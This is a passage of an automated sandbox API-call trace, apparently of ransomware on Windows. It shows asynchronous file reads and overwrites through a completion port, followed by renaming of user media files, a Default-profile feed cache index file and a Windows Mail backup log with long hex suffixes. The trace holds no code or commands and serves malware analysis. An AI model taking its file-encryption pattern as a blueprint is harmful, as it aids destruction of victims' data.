lpOverlapped=0x714f8b0) returned 1 [0164.351] WriteFile (in: hFile=0x5cc, lpBuffer=0x76d8840*, nNumberOfBytesToWrite=0x7000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8708 | out: lpBuffer=0x76d8840*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8708) returned 1 [0164.352] RtlInterlockedCompareExchange64 () returned 0x8 [0164.352] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.352] WriteFile (in: hFile=0x5d0, lpBuffer=0x7700998*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e0860 | out: lpBuffer=0x7700998*, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e0860) returned 1 [0164.353] RtlInterlockedCompareExchange64 () returned 0x9 [0164.353] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.353] WriteFile (in: hFile=0x5d4, lpBuffer=0x7728af0*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77089b8 | out: lpBuffer=0x7728af0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77089b8) returned 1 [0164.354] RtlInterlockedCompareExchange64 () returned 0xa [0164.354] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.355] WriteFile (in: hFile=0x5d8, lpBuffer=0x7750c48*, nNumberOfBytesToWrite=0x7c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7730b10 | out: lpBuffer=0x7750c48*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7730b10) returned 1 [0164.356] RtlInterlockedCompareExchange64 () returned 0xb [0164.356] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.356] WriteFile (in: hFile=0x5dc, lpBuffer=0x7778da0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7758c68 | out: lpBuffer=0x7778da0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7758c68) returned 1 [0164.357] RtlInterlockedCompareExchange64 () returned 0xc [0164.357] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, 
lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.358] WriteFile (in: hFile=0x5e0, lpBuffer=0x77a0ef8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7780dc0 | out: lpBuffer=0x77a0ef8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7780dc0) returned 1 [0164.359] RtlInterlockedCompareExchange64 () returned 0xd [0164.359] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0164.359] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x755a4d0, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x755a4d0, ReturnLength=0x714f8ac) returned 0x0 [0164.360] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4", lpString2=".0511E6348750B24F7AD4C9FABAC4FB75D5F2145EDB84CB4D8A30AAE6D5CE0B6B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4.0511E6348750B24F7AD4C9FABAC4FB75D5F2145EDB84CB4D8A30AAE6D5CE0B6B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4.0511E6348750B24F7AD4C9FABAC4FB75D5F2145EDB84CB4D8A30AAE6D5CE0B6B" [0164.360] GetProcessHeap () returned 0x270000 [0164.360] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x425cdf0 [0164.361] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x714f89c, FileInformation=0x425cdf0, Length=0x122, FileInformationClass=0xa) returned 0x0 [0164.363] CloseHandle (hObject=0x5b4) returned 1 [0164.366] GetProcessHeap () returned 0x270000 [0164.368] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x755a420 | out: hHeap=0x270000) returned 1 [0164.671] 
RtlInterlockedCompareExchange64 () returned 0x8 [0164.671] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0165.988] WriteFile (in: hFile=0x5b0, lpBuffer=0x7610188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75f0050 | out: lpBuffer=0x7610188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75f0050) returned 1 [0165.990] RtlInterlockedCompareExchange64 () returned 0x2 [0165.990] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.858] ReadFile (in: hFile=0x58c, lpBuffer=0x76282d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76081a0 | out: lpBuffer=0x76282d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76081a0) returned 1 [0167.862] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.863] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x7608250, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7608250, ReturnLength=0x714f8ac) returned 0x0 [0167.864] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a", lpString2=".EA93EA9A2392EF1418FC72346CE11DDC28CAFD46F08BF8D10F6ADBB2D37AE26D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV 
sb2I\\HgGnGttNLJOcZZ62.m4a.EA93EA9A2392EF1418FC72346CE11DDC28CAFD46F08BF8D10F6ADBB2D37AE26D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a.EA93EA9A2392EF1418FC72346CE11DDC28CAFD46F08BF8D10F6ADBB2D37AE26D" [0167.865] GetProcessHeap () returned 0x270000 [0167.865] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x42636d8 [0167.865] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x714f89c, FileInformation=0x42636d8, Length=0x132, FileInformationClass=0xa) returned 0x0 [0167.866] CloseHandle (hObject=0x58c) returned 1 [0167.867] GetProcessHeap () returned 0x270000 [0167.869] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76081a0 | out: hHeap=0x270000) returned 1 [0167.869] RtlInterlockedCompareExchange64 () returned 0x1 [0167.869] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.870] WriteFile (in: hFile=0x5e4, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0167.871] RtlInterlockedCompareExchange64 () returned 0x0 [0167.871] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.890] WriteFile (in: hFile=0x5e4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.892] RtlInterlockedCompareExchange64 () returned 0x0 [0167.892] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.914] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x76900b8, ReturnLength=0x714f8ac) returned 0x0 [0167.915] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a", lpString2=".E6AF0F27540E8948D87128F0C6766FB3B7A97C224D598A5A0CA1AD91065BE416" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a.E6AF0F27540E8948D87128F0C6766FB3B7A97C224D598A5A0CA1AD91065BE416") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a.E6AF0F27540E8948D87128F0C6766FB3B7A97C224D598A5A0CA1AD91065BE416" [0167.915] GetProcessHeap () returned 0x270000 [0167.915] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x138) returned 0x4263968 [0167.915] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x714f89c, FileInformation=0x4263968, Length=0x138, FileInformationClass=0xa) returned 0x0 [0167.917] CloseHandle (hObject=0x5e4) returned 1 [0167.917] GetProcessHeap () returned 0x270000 [0167.918] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.919] RtlInterlockedCompareExchange64 () returned 0x1 [0167.919] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.922] ReadFile (in: hFile=0x5e4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, 
lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.922] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.923] WriteFile (in: hFile=0x5e4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.924] RtlInterlockedCompareExchange64 () returned 0x0 [0167.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.949] WriteFile (in: hFile=0x5e4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.951] RtlInterlockedCompareExchange64 () returned 0x0 [0167.951] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.969] WriteFile (in: hFile=0x5a4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.971] RtlInterlockedCompareExchange64 () returned 0x0 [0167.971] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, 
lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0167.990] WriteFile (in: hFile=0x5a4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.992] RtlInterlockedCompareExchange64 () returned 0x0 [0167.992] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.010] WriteFile (in: hFile=0x5e4, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.011] RtlInterlockedCompareExchange64 () returned 0x0 [0168.011] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.029] WriteFile (in: hFile=0x5e4, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.034] RtlInterlockedCompareExchange64 () returned 0x0 [0168.035] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.048] WriteFile (in: hFile=0x5e4, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.050] RtlInterlockedCompareExchange64 () returned 0x0 [0168.050] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.061] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.062] RtlInterlockedCompareExchange64 () returned 0x0 [0168.062] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.071] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.072] RtlInterlockedCompareExchange64 () returned 0x0 [0168.072] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0168.082] WriteFile (in: hFile=0x58c, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0168.354] RtlInterlockedCompareExchange64 () returned 0x0 [0168.356] RtlInterlockedCompareExchange64 () returned 0x0 
[0168.356] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0169.348] ReadFile (in: hFile=0x5cc, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0169.348] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.357] ReadFile (in: hFile=0x5cc, lpBuffer=0x7400180, nNumberOfBytesToRead=0x2e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0170.357] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.402] WriteFile (in: hFile=0x604, lpBuffer=0x75ca140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008) returned 1 [0170.410] RtlInterlockedCompareExchange64 () returned 0x0 [0170.410] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.658] NtQueryObject (in: Handle=0x604, ObjectInformationClass=0x1, ObjectInformation=0x75aa0b8, 
ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x75aa0b8, ReturnLength=0x714f8ac) returned 0x0 [0170.659] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat", lpString2=".143993F39C8615A5FE2B8BA3E571A04588213E96677CD12659B24BFD7F008F1A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.143993F39C8615A5FE2B8BA3E571A04588213E96677CD12659B24BFD7F008F1A") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.143993F39C8615A5FE2B8BA3E571A04588213E96677CD12659B24BFD7F008F1A" [0170.659] GetProcessHeap () returned 0x270000 [0170.659] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13a) returned 0x7418970 [0170.660] NtSetInformationFile (FileHandle=0x604, IoStatusBlock=0x714f89c, FileInformation=0x7418970, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0170.687] CloseHandle (hObject=0x604) returned 1 [0170.688] GetProcessHeap () returned 0x270000 [0170.689] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0170.690] RtlInterlockedCompareExchange64 () returned 0x1 [0170.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.699] ReadFile (in: hFile=0x5a4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0170.699] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, 
lpOverlapped=0x714f8b0) returned 1 [0170.700] WriteFile (in: hFile=0x5a4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0170.701] RtlInterlockedCompareExchange64 () returned 0x0 [0170.701] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.703] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x73e00f8, ReturnLength=0x714f8ac) returned 0x0 [0170.704] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log", lpString2=".FF265B0825DBB300ECC2604A4DCB113BED774F4BEA601FB1DE14C1449D24EC30" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.FF265B0825DBB300ECC2604A4DCB113BED774F4BEA601FB1DE14C1449D24EC30") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.FF265B0825DBB300ECC2604A4DCB113BED774F4BEA601FB1DE14C1449D24EC30" [0170.704] GetProcessHeap () returned 0x270000 [0170.704] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35bb78 [0170.704] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x714f89c, FileInformation=0x35bb78, Length=0x158, FileInformationClass=0xa) returned 0x0 [0170.801] CloseHandle (hObject=0x5a4) returned 1 [0170.803] GetProcessHeap () returned 0x270000 [0170.804] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.804] RtlInterlockedCompareExchange64 () returned 
0x1 [0170.804] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.804] ReadFile (in: hFile=0x598, lpBuffer=0x75526e0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8) returned 1 [0170.805] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.805] ReadFile (in: hFile=0x5d8, lpBuffer=0x757a838, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700) returned 1 [0170.805] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.805] ReadFile (in: hFile=0x5b4, lpBuffer=0x7841298, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7821160 | out: lpBuffer=0x7841298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7821160) returned 1 [0170.806] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0170.806] ReadFile (in: hFile=0x5f4, lpBuffer=0x78693f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x0, lpOverlapped=0x78492b8 | out: lpBuffer=0x78693f0*, 
